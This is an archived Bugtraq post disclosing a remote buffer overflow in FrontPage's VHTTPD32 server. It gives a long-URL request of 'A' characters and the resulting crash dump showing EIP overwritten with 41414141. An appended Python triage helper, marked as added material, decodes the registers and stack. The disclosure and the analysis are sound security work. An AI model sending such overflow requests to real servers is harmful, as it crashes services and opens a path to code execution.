Bugtraq mailing list archives

Re: More vulnerabilities in FP


From: webmad () MAIL RU (Roman)
Date: Sat, 22 Apr 2000 22:16:18 +0200


Hello,

First remote FrontPage exploit?

How about this one:
http://server/AAAAAAAAAAAA<a lots of A>AAAAAA

FP will overflow and someone will see this message:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000

Tested on FP 3.0.2.926. Maybe others?
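
A triage helper for the crash report above, as an added example that is not part of the original post: it flags registers overwritten with a repeated printable byte and decodes the stack dump's little-endian dwords to ASCII. The function names are hypothetical; the register and stack values are copied from the report.

```python
import re

# Register and stack lines copied from the crash report in the post.
CRASH = """\
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000
"""

def filler_registers(report):
    """Map each 32-bit register made of one repeated printable byte to that byte."""
    hits = {}
    for name, value in re.findall(r"\b(E[A-Z]{2})=([0-9a-fA-F]{8})\b", report):
        raw = bytes.fromhex(value)
        if len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F:
            hits[name] = chr(raw[0])
    return hits

def stack_text(report):
    """Decode the stack dump's dwords (x86, little-endian) into printable text."""
    _, _, dump = report.partition("Stack dump:")
    raw = b"".join(bytes.fromhex(w)[::-1] for w in re.findall(r"\b[0-9a-fA-F]{8}\b", dump))
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)

if __name__ == "__main__":
    print("registers holding filler:", filler_registers(CRASH))
    print("stack as text:", stack_text(CRASH))
```

On this report it flags EIP and EBP as "A" filler, and the decoded stack shows the filler bytes followed by error-message text: `AAAAAAAAAA failed for 127.0.0.1, reason: file does not exist`.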

